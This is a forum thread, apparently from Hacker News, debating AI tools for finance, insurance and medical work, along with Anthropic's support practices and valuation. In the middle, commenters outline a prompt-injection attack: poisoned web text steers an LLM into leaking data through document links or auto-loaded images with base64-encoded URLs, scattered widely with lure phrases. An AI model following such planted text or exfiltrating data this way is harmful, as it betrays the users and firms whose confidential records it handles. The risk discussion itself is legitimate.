I don't trust these AI-only companies to be overnight experts in properly handling medical, financial and insurance data. They have no business providing these tools, unless they want to take all the risk too.

I think a lot of people are misunderstanding the typical workload of people in Financial Services. They aren't using Claude to transfer money, they're just building a LOT of slideshows and fancy excel docs on made-up numbers to try to sell mergers and new financing options/types of loans. Most programmers would just consider this "sales".

> made-up numbers

It's important to note that in most jurisdictions you can't actually do this legally? Like, you may be able to get away with it, but it is actually illegal to sell financial services by misrepresentation?

You can say anything you want in forward looking statements in the US, within reason.

"They will have $1B in revenue by year end" is perfectly fine to completely make up.

there's a lot of domain knowledge in some of those areas.

that domain knowledge is acquired by talking to people - which A.I can't do - all kinds of people since the knowledge isn't written down.

I know this having dated a girl who did M&A deals for media properties - you know your big tv shows/movies etc

That’s a gross over generalization. Some of the insurance data here suggests use of AI to make underwriting decisions. There are several states with regulations which could potentially pull these agent solutions into their regulatory oversight if used by the industry to effect insurance outcomes.

Odd lots podcast had an interesting snippet about an financial institution that uses AI to make loan decisions. The guest said that they only use it on applicants who were rejected in the traditional sequence, and then uses AI to accept them if possible. That way there's an articulable reason for a rejection, but they use the non-deterministic AI to allow an extra person through - since the laws about loans are mostly around not discriminating against people - companies are (generally) welcome to accept whoever.

That's dependent on the credit laws of the country in question though. In Australia you have it both ways, you cannot unreasonably discriminate (e.g. race, gender etc) but at the same time you are forbidden from issuing credit to applicants who cannot meet the affordability requirements of said credit. E.g. issuing a loan to a customer who provably cannot afford it is a breach of the NCC, and the company is held responsible for this. As a credit provider you must make reasonable enquiries into a customer's financial position, failing to do this is a breach. You must also be able to explain and justify the decision to issue credit if challenged by the civil regulator (AFCA - who are granted significant power in addressing this), on the basis of a customer complaint, and they most certainly do not accept "human said no but the computer then said yes" without hard facts such as proven positive income flow (pay slips, bank statements), known expenses, liabilities and reliable credit history.

> They aren't using Claude to transfer money, they're just [...]

It might be lower stakes, but isn't that still a juicy target for data-exfiltration attacks?

In other words, imagine if one of your direct competitors was watching everything your employee read while making spreadsheets and slideshows.

Yes, corporate espionage may be alive and real but would claude on their microsoft/amazon/google cloud be different from documents on that same cloud?

Treating this as being about cloud-storage boundaries is, er, insufficiently paranoid.

Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.

Once that happens, exfiltration can be as simple as generating a spreadsheet/doc with a link or small auto-loaded image, and an URL that has data base64'ed into it.

Or you could just get a hooker to sleep with one of them and plug a USB into their work laptops. I'm not trying to say there's nothing to worry about, but do you really think LLMs present that much larger of an attack surface than exists now?

The work BigIP is doing on LLM traffic analysis is cool though.

Stop thinking about hyper-targeted attacks (though those are a concern too) and consider indiscriminate ones.

1. It costs nothing to scatter poisonous data around that'll be infectious for ages

2. Running the exfiltrated-data endpoint is low-traffic and low-complexity

3. Even if it only affects a few targets you've probably recouped your investment.

The nature of LLMs also invites wide-net attacks. While one might tailor for specific models, victims could be anybody. You don't need to predict any idiosyncratic details like filenames, you can drop a phrase like "the most-confidential information that shouldn't be released publicly", and—thanks to the magic of LLM word association—you'll get a pretty good hit-rate. False hallucinations are a problem, but victims are hard at work attempting to minimize it already, and (since morals are already out the window) even plausible-but-false data could be used to sabotage reputations or threaten the same.

The only reason they are doing it is because there are regulation for people but not for machines.

This is objectively not true. You can’t get around HIPAA by saying “lol wasn’t me it was an Agent”

You can bet that someone out there is probably trying to build a startup right now based on that idea.

Yep. There's no certification needed to create a financial model or close monthly books.

HIPAA doesn't require any certification either. Some organizations voluntarily choose to earn certification from private companies that offer certifications for compliance with HIPAA privacy or administrative simplification rules but this is completely optional.

[deleted]

For doing some reporting stuff internally, there isn’t a certification. But there are definitely humans who have to certify financial statements and communications for financial offerings.

Can't wait for Claude to submit fake tax records for me so that I can commit fraud legally.

This is my litmus test.

If AI is really as wonderous as everybody says, why didn't all the employees of all the AI companies simply type "Claude, file my taxes for me" as a prompt and walk away?

Because having to ask suggests that the AI didn't already do it for you pre-emptively.

If you're not yet waking up to AI completing tasks for you that you didn't directly ask for, you might be falling behind the curve. A good personal assistant does what you ask, a better personal assistant knows what you need before you do and has it completed before you reach your desk. AI is already starting to reach into the latter category.

(edit: dialled back some unnecessary snark.)

My experience has been quite the opposite. Some bank processes remain oral traditions about clicking excel filters by hand because any code would have to be extensively documented and tested.

I would recommend you to not use these, if you are not willing to absorb the risk.

Luckily there is still a significant market for the services.

Some human always gets to be the certified fall guy for non-compliance. Maybe the legal agent can help structure the company so that is an ignorant lower level accountant and not the CFO.

Currently we don't know the risk, so it is kind of hard to absorb.

Decade-old spoilers for "How I Met Your Mother" ... but there's a character who has that kind of job, as a legal meat-shield.

https://www.youtube.com/watch?v=8u62HptZ6TE

> properly handling

Why, they can sell user data to other brokers. Experts indeed! But not in insurance or finance, of course.

Claude's actually pretty great at this! I actually used to use Claude A LOT to answer interesting questions (which I'll be writing up on!) More generally, Claude is palpably different from most other agents. I'd recommend these models – especially Opus – without qualifications.

But there's a process risk here based on their current practises. I'm hoping those practises change so that I can recommend Claude to everyone I know, but as of now, there's existential risk exposure here that's greater than Google's.

Anthropic's automated systems can and will ban you for pretty arbitrary things; and you won't get human support or Claude – even if you are an enterprise paying out of your nose. And there's 0 redressal unless you go viral on social media. Or know someone who knows someone. See: https://x.com/Whizz_ai/status/2051180043355967802 https://x.com/theo/status/2045618854932734260

And I say that as someone who likes how Anthropic has been training Claude and Opus. I just don't think they're prepared to be the trillion dollar company they've become. They are – in a very real way – suffering from success. Which is extremely inconvenient to be on the receiving end of when you're on a deadline.

Before AI, shipping code to production used to be a two-person task: one writes the code, another one reviews the code. Now with AI writing the code, the developer that was supposed to write the code, only has to review it. And this is because they are responsible for the code they ship.

Code review has become unbearable because before AI, developers were reviewing code as they went writing it in the first place. Granted, never perfect and why a second person reviewing code was (is?) a best practice. But effectively there was always some level of code review happening as developers wrote code.

I fear it is way more boring to review financial and medical documents completely written by AI than it is to write (and at the same time review) by yourself. And way more dangerous to ship mistakes than in most software.

> the developer that was supposed to write the code, only has to review it.

But more often than not that developer ends up reviewing far more lines of code due to the typical verbosity of an LLM.

100%... that's why I say code review became unbearable!

I am/was writing up an interesting hypothesis with Claude's help. But I redid the most important parts of the data pipeline manually. As in went in and cmd-c + cmd-v'ed the data by hand to create a reference, and I'm randomly spot checking 33% of the larger records.

The analysis itself; I'm doing it by hand.

Why not the developer write the code, then the AI review the code, and then finally a signoff from another human?

Far too often people think productivity is the point. Maybe the point is developer's understanding of the product IS the product?

You're not engineering black boxes, you're engineering legible boxes.

> Far too often people think productivity is the point. Maybe the point is developer's understanding of the product IS the product?

This is an interesting take.

Isn’t there a code review agent?

Most workflows use a sub agent to review the code or an agent from a different company.

For example, Codex can review code written by Claude, etc.

/s?

Pretty great at what? I work in the insurance industry specifically medicare. All I see is sales people and other managers slopping out AI dashboards off of spreadsheets galore. Not only is it terrible for protecting PHI/PII. It also doesn't do things like RBAC very well either. Now instead of preventing a person from externally sharing a file i have to make sure they didn't egress the file to supabase or some other platform.

Here's some of the horrible things i've seen. Frontend dashboard with PHI/PII deployed via vercel/next because AI told them how to get their site online. Login is hardcoded into the frontend so anyone with inspect can find the password.

Another "fixed" dashboard deployed the same way. This time they added firebase auth so they got sign in with Google added with only logging into our domain. Wait how would they be able to create a token for our domain? They didn't the frontend just blocks domains from calling firebase.auth but firebase doesn't care. So simply calling the function in the console lets me login with any gmail account....

They also where showing me their RBAC with firebase. Again they don't have access to our Orgnization/Directory/Groups. So i wondered how they did this.. wouldn't you guess its a hardcoded list of approved users. You can literally call firebase.auth and sign in anonymously. Again only the frontend checks the email addresses. So now that i have a firebase auth all the backend firebase function just check that you have auth'd. So i can make any request i want to the backend. The frontend simply won't show me the code.

I could go on and on about the stupidity levels I'm facing but I don't feel like crashing out.

All I can say is this tool is only useful if you already know how to correctly implement these things. Does it save me time sure but I have to call it retarded and explain why not to do things. Honestly I feel like claude is good for people who like to gamble. When it gets it right it feels great but I don't want to roll the dice 30 times to get it correct.

[flagged]

> and you won't get human support or Claude – even if you are an enterprise paying out of your nose. And there's 0 redressal unless you go viral on social media.

Sadly this sounds like par for the course when it comes to tech. Too many messages and requests for help depend on knowing someone in the right slack groups.

If you’re paying out of your nose, you would have forward deployed Anthropic/OpenAI engineers on the premises.

[deleted]

Which is very confusing to me. If you have groundbreaking AI, you can offer groundbreaking support at scale.

You wouldn't build a chat bot for that, imagine how easy it is to make that thing go off the rails and allow anyone to reactivate their account. Really, you can't trust it to do any business function...

At least, that's really the message this sends in my opinion

I really wish more people would view these companies with the suspicion they deserve, as they sell the product as safe and comprehensive while refusing/failing to use it the same way themselves.

> If you have groundbreaking AI, you can offer groundbreaking support at scale

You're a funny one aren't you...

Meet "Fin" Anthropic's "where support questions go to die" so-called-support bot, created by Intercom but powered by Anthropic.

Maybe it's an internal in-joke in the Anthropic offices ... "Fin" in french means "End".

I don't know anyone who has had a positive experience with "Fin" .... or ever spoken to a human at Anthropic support for that matter, even if you ask "Fin" to escalate.

"Claude, please unban me"

Nope.

Customer support and safety are cost centers. It doesn’t scale like software does and no one’s KPIs are going to improve dramatically if you provide support beyond a point.

AI and LLMs are the cool tech, and the most important thing is to push the frontier. Money spent elsewhere is money not spent on R&D.

It would be hilarious if it wasn’t the GDPs of nations being spent on this.

They aren't even close to a 1T company, they're valued at <400bb and that's at like a 20x-30x multiple. They can probably raise money at a higher valuation but its literally just value based on hype, not revenue.

Check the secondaries market ;-)

fomo/hype, not revenue. Google's AI business is a profitable business model and training to inference is vertically integrated. Their AI biz did not add 1T to their market cap, despite their much more advantageous position. A 1T valuation for Anthropic makes absolutely no sense.

It also makes no sense to me there are people qualified to participate in these secondary markets who are that stupid, but here we are.

I do know 2 people participating in secondaries, one of them explicitly with Anthropic shares: I would not consider any of them stupid :-)

And for participating there, there is not "a qualification that allows you to enter", its other metrics.

If Anthropics valuation makes no sense - fair enough - but why is then OAI evaluation of 850b correct?